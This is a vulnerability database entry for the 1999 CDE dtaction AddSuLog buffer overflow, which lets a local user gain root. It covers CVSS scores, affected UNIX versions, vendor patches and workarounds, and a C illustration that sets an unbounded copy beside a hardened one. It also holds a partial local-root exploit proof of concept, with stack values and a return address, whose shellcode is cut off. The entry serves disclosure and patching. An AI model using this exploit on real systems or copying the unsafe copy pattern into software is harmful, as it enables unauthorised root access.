Published: 1999-09-13 00:00:00
Revised: 2008-09-09 08:35:14

[Original] Buffer overflow in the AddSuLog function of the CDE dtaction utility allows local users to gain root privileges via a long user name.

[CNNVD] Multiple vendor CDE dtaction Userflag buffer overflow vulnerability (CNNVD-199909-022)

A buffer overflow vulnerability exists in the AddSuLog function of the CDE dtaction utility. A local user can gain root privileges by supplying a long user name.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can bring the system down entirely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:4.1.2  IBM AIX 4.1.2
cpe:/o:ibm:aix:4.3.2  IBM AIX 4.3.2
cpe:/o:ibm:aix:4.1.4  IBM AIX 4.1.4
cpe:/o:ibm:aix:4.3    IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1  IBM AIX 4.3.1
cpe:/o:ibm:aix:4.1.5  IBM AIX 4.1.5
cpe:/o:ibm:aix:4.1.3  IBM AIX 4.1.3
cpe:/o:ibm:aix:4.2.1  IBM AIX 4.2.1
cpe:/o:ibm:aix:4.1    IBM AIX 4.1
cpe:/o:ibm:aix:4.2    IBM AIX 4.2
cpe:/o:ibm:aix:4.1.1  IBM AIX 4.1.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:3078  CDE AddSuLog Function Buffer Overflow

- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN) SUN 00192

- Vulnerability information

Multiple vendor CDE dtaction Userflag buffer overflow vulnerability
High risk | Buffer overflow
1999-09-13 00:00:00 | 2005-05-02 00:00:00
A buffer overflow vulnerability exists in the AddSuLog function of the CDE dtaction utility. A local user can gain root privileges by supplying a long user name.

- Advisories and patches

Updated SGI advisory (20021102-02-P) and patch details available.
This solution information has been quoted from CERT Advisory CA-99-11: Four Vulnerabilities in the Common Desktop Environment. This advisory is referenced in the 'Credit' section of this vulnerability entry. Please note that some of these fixes are temporary. This information is not considered complete: some vendors were still investigating the problem as of the posting of this entry, and some of the provided information is incomplete.

Compaq's Tru64/DIGITAL UNIX
This potential security problem has been resolved and a patch for this problem has been made available for Tru64 UNIX V4.0D, V4.0E and V4.0F.
This patch can be installed on:
V4.0D Patch kit BL11 or BL12
V4.0E Patch kit BL1 or BL12
V4.0F Patch kit BL1
*This solution will be included in a future distributed release of Compaq's Tru64/DIGITAL UNIX.
This patch may be obtained from the World Wide Web at the following FTP address:

IBM Corporation
All releases of AIX version 4 are vulnerable to vulnerabilities #1, #3, and #4. AIX is not vulnerable to #2. The following APARs will be available soon:
AIX 4.1.x: IY03125 IY03847
AIX 4.2.x: IY03105 IY03848
AIX 4.3.x: IY02944 IY03849
Customers that do not require the CDE desktop functionality can disable CDE by restricting access to the CDE daemons and removing the dt entry from /etc/inittab. Run the following commands as root to disable CDE:
# /usr/dt/bin/dtconfig -d
# chsubserver -d -v dtspc
# chsubserver -d -v ttdbserver
# chsubserver -d -v cmsd
# chown root.system /usr/dt/bin/*
# chmod 0 /usr/dt/bin/*
For customers that require the CDE desktop functionality, a temporary fix is available via anonymous ftp from:
Filename        sum          md5
dtaction_4.1    32885   18   82af470bbbd334b240e874ff6745d8ca
dtaction_4.2    52162   18   b10f21abf55afc461882183fbd30e602
dtaction_4.3    56550   19   6bde84b975db2506ab0cbf9906c275ed
libtt.a_4.1     29234 2132   f5d5a59956deb8b1e8b3a14e94507152
libtt.a_4.2     21934 2132   73f32a73873caff06057db17552b8560
libtt.a_4.3     12154 2118   b0d14b9fe4a483333d64d7fd695f084d
ttauth          56348   31   495828ea74ec4c8f012efc2a9e6fa731
ttsession_4.1   19528  337   bfac4a06b90cbccc0cd494a44bd0ebc9
ttsession_4.2   46431  338   05949a483c4e390403055ff6961b0816
ttsession_4.3   54031  339   e1338b3167c7edf899a33520a3adb060
NOTE - This temporary fix has not been fully regression tested. Use the following steps (as root) to install the temporary fix.
1. Uncompress and extract the fix.
# uncompress < cdecert.tar.Z | tar xf -
# cd cdecert
2. Replace the vulnerable executables with the temporary fix for your version of AIX.
# (cd /usr/dt/lib && mv libtt.a libtt.a.before_security_fix)
# (cd /usr/dt/bin && mv ttsession ttsession.before_security_fix)
# (cd /usr/dt/bin && mv dtaction dtaction.before_security_fix)
# chown root.system /usr/dt/lib/libtt.a.before_security_fix
# chown root.system /usr/dt/bin/ttsession.before_security_fix
# chown root.system /usr/dt/bin/dtaction.before_security_fix
# chmod 0 /usr/dt/lib/libtt.a.before_security_fix
# chmod 0 /usr/dt/bin/ttsession.before_security_fix
# chmod 0 /usr/dt/bin/dtaction.before_security_fix
# cp ./libtt.a_ /usr/dt/lib/libtt.a
# cp ./ttsession_ /usr/dt/bin/ttsession
# cp ./dtaction_ /usr/dt/bin/dtaction
# cp ./ttauth /usr/dt/bin/ttauth
# chmod 555 /usr/dt/lib/libtt.a
# chmod 555 /usr/dt/bin/ttsession
# chmod 555 /usr/dt/bin/dtaction
# chmod 555 /usr/dt/bin/ttauth
IBM AIX APARs may be ordered using Electronic Fix Distribution (via the FixDist program), or from the IBM Support Center. For more information on FixDist, and to obtain fixes via the Internet, please reference
or send electronic mail to "" with the word "FixDist" in the "Subject:" line. To facilitate ease of ordering all security related APARs for each AIX release, security fixes are periodically bundled into a cumulative APAR. For more information on these cumulative APARs, including last update and list of individual fixes, send electronic mail to "" with the word "subscribe Security_APARs" in the "Subject:" line.
Sun Microsystems
The following patches are available:
CDE version      Patch ID
SunOS version    Patch ID
SunOS 5.7 sparc  108219-01
SunOS 5.7 x86    108220-01
SunOS 5.6 sparc  108201-01
SunOS 5.6 x86    108202-01
Patches are available to all Sun customers at
Sun Solaris 2.6
  • Sun 108201-01

IBM AIX 4.3
  • IBM IY02944

IBM AIX 4.3.1
  • IBM IY02944

IBM AIX 4.3.2
  • IBM IY02944

SGI IRIX 6.5
SGI IRIX 6.5.1
SGI IRIX 6.5.10
SGI IRIX 6.5.10 f
SGI IRIX 6.5.10 m
SGI IRIX 6.5.11
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12 m
  • SGI 4416

- Vulnerability information (19497)

DIGITAL UNIX 4.0 d/e/f, AIX <= 4.3.2, CDE <= 2.1, IRIX <= 6.5.14, Solaris <= 7.0 Buffer Overflow (EDBID:19497)
multiple local
1999-09-13 Verified
0 Job de Haas of ITSX
N/A
TRU64/DIGITAL UNIX 4.0 d/e/f, AIX <= 4.3.2, Common Desktop Environment <= 2.1, IRIX <= 6.5.14, Solaris <= 7.0 dtaction Userflag Buffer Overflow Vulnerability


CDE is the Common Desktop Environment, an implementation of a Desktop Manager for systems that run X. It is distributed with various commercial UNIX implementations.

Under some distributions of CDE (Common Desktop Environment), the dtaction program has a locally exploitable buffer overflow. The overflow is in the argument parsing code for the -u (user) option: any user-supplied value longer than 1024 bytes overruns the buffer and can in turn be exploited by a malicious user.

Since dtaction is typically installed setuid root, this makes it possible for a local user to gain administrative access on a vulnerable system.
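As an added illustration (not dtaction's source, which is not on this page): the unbounded-copy pattern the description above refers to, beside a hardened version that refuses a -u value too long for its 1024-byte buffer and treats truncation as an error. The function names, the log prefix and the buffer size are assumptions chosen to match the 1024-byte figure above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative reconstruction, not dtaction's real source: the advisory says
 * anything over 1024 bytes given to -u overruns a fixed-size buffer. */
#define USERBUF_LEN 1024
#define LOG_PREFIX  "dtaction su: "

/* Vulnerable pattern: the -u argument is formatted into a fixed buffer with
 * no length bound, so a name longer than the buffer overwrites the stack.
 * Never call this with untrusted input; it is here only for comparison. */
void add_su_log_unsafe(char *log, const char *user)
{
    char entry[USERBUF_LEN];
    sprintf(entry, LOG_PREFIX "%s", user);   /* unbounded write */
    strcpy(log, entry);
}

/* Hardened form: refuse names that cannot fit, use bounded formatting, and
 * treat truncation as an error rather than silently logging a cut entry. */
int add_su_log_safe(char *log, size_t logsz, const char *user)
{
    char entry[USERBUF_LEN];
    if (strlen(user) >= USERBUF_LEN - strlen(LOG_PREFIX))
        return -1;                             /* would overflow: reject */
    int n = snprintf(entry, sizeof entry, LOG_PREFIX "%s", user);
    if (n < 0 || (size_t)n >= sizeof entry || (size_t)n >= logsz)
        return -1;                             /* truncated: reject */
    memcpy(log, entry, (size_t)n + 1);
    return 0;
}

/* Test helper: builds a constructed name of `len` 'A' bytes, runs it through
 * the safe path and returns its verdict (0 accepted, -1 rejected). */
int accept_name_of_length(size_t len)
{
    char *name = malloc(len + 1), log[USERBUF_LEN];
    if (!name) return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    int rc = add_su_log_safe(log, sizeof log, name);
    free(name);
    return rc;
}
```

With the 13-byte prefix assumed here, the safe path accepts names up to 1010 bytes and rejects anything longer, so the 1024-byte entry buffer can never be overrun.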

/*
 * dtaction_ov.c
 * Job de Haas
 * (c) ITSX bv 1999
 * This program demonstrates an overflow problem in /usr/dt/bin/dtaction.
 * It has only been tested on Solaris 7 x86
 * assembly code has been taken from ex_dtprintinfo86.c by
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>

#define BUFLEN 998

char exploit_code[] =
    /* the shellcode string is cut off on this page */

int main(void)
{
    char *argp[6], *envp[3];
    char buf[2048];
    unsigned long *p;
    struct passwd *pw;
    int buflen;

    if ((pw = getpwuid(getuid())) == NULL) {
        /* error handling is cut off on this page */
    }

    buflen = BUFLEN - strlen( pw->pw_name );

    strncpy( &buf[500], exploit_code, strlen(exploit_code));

    /* set some pointers to values that keep code running */
    p = (unsigned long *)&buf[buflen];
    *p++ = 0x37dc779b;
    *p++ = 0xdfaf6502;
    *p++ = 0x08051230;
    *p++ = 0x080479b8;

    /* the return address. */
    *p++ = 0x08047710;
    *p = 0;

    argp[0] = strdup("/usr/dt/bin/dtaction");
    argp[1] = strdup("-u");
    argp[2] = strdup(buf);
    argp[3] = strdup("Run");
    argp[4] = strdup("/usr/bin/id");
    argp[5] = NULL;

    if (!getenv("DISPLAY")) {
        printf("forgot to set DISPLAY\n");
        /* exit path is cut off on this page */
    }

    envp[0] = malloc( strlen("DISPLAY=")+strlen(getenv("DISPLAY"))+1);
    envp[1] = NULL;

    /* the remainder of the program is cut off on this page */
}




- Vulnerability information

Multiple Vendor CDE dtaction AddSuLog Function Local Overflow
Local Access Required, Input Manipulation
Loss of Integrity, Patch / RCS
Exploit Public, Vendor Verified, Third-party Verified

- Vulnerability description

- Timeline

1999-09-13 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, multiple vendors have released patches to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete